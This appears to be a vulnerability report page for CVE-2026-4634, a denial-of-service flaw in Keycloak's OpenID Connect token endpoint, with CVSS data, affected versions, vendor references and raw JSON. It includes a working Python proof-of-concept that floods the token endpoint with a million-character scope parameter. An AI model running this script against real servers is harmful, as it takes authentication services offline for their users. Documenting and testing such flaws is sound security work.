Security Vulnerability Report
CVE-2026-4634 CVSS 7.5 HIGH

CVE-2026-4634

Published: 2026-04-02 13:16:27
Last Modified: 2026-04-16 20:50:10

Description

A flaw was found in Keycloak. An unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request with an excessively long scope parameter to the OpenID Connect (OIDC) token endpoint. This leads to high resource consumption and prolonged processing times, ultimately resulting in a Denial of Service (DoS) for the Keycloak server.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:* - VULNERABLE
Keycloak (for the specific affected versions, refer to the Red Hat security advisory RHSA-2026:6475 and related advisories)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_cve_2026_4634(target_url):
    """
    PoC for CVE-2026-4634: Keycloak DoS via long scope parameter.
    Warning: For educational purposes only.
    """
    # The OIDC token endpoint
    full_url = f"{target_url}/realms/master/protocol/openid-connect/token"

    # Craft a malicious scope parameter with excessive length
    # Adjust the length (e.g., 1000000) as needed to trigger resource exhaustion
    malicious_scope = "A" * 1000000

    payload = {
        "client_id": "admin-cli",
        "grant_type": "password",
        "username": "test",
        "password": "test",
        "scope": malicious_scope,
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
    }

    try:
        print(f"Sending payload to {full_url}...")
        response = requests.post(full_url, data=payload, headers=headers, timeout=10)
        print(f"Status Code: {response.status_code}")
        print("Server might be unresponsive if vulnerable.")
    except requests.exceptions.Timeout:
        print("Request timed out. Potential DoS condition triggered.")
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    target = "http://localhost:8080"  # Replace with actual target
    exploit_cve_2026_4634(target)

References

- https://access.redhat.com/errata/RHSA-2026:6475 (Vendor Advisory)
- https://access.redhat.com/errata/RHSA-2026:6476 (Vendor Advisory)
- https://access.redhat.com/errata/RHSA-2026:6477 (Vendor Advisory)
- https://access.redhat.com/errata/RHSA-2026:6478 (Vendor Advisory)
- https://access.redhat.com/security/cve/CVE-2026-4634 (Vendor Advisory)
- https://bugzilla.redhat.com/show_bug.cgi?id=2450250 (Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4634", "sourceIdentifier": "[email protected]", "published": "2026-04-02T13:16:27.027", "lastModified": "2026-04-16T20:50:10.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request with an excessively long scope parameter to the OpenID Connect (OIDC) token endpoint. This leads to high resource consumption and prolonged processing times, ultimately resulting in a Denial of Service (DoS) for the Keycloak server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1050"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "1830E455-7E11-4264-862D-05971A42D4A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:*", "matchCriteriaId": "C339EBE3-6BFD-4082-B904-4E8DB87AAE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:*", "matchCriteriaId": "3BDF8A92-727E-401B-80BB-A141DCB39750"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:*", "matchCriteriaId": "100AA077-7467-4F62-A8FD-88BC336972DF"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:*", "matchCriteriaId": "17E79930-BE1C-4901-AF63-36B3EB149AFC"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6475", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6476", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4634", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450250", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}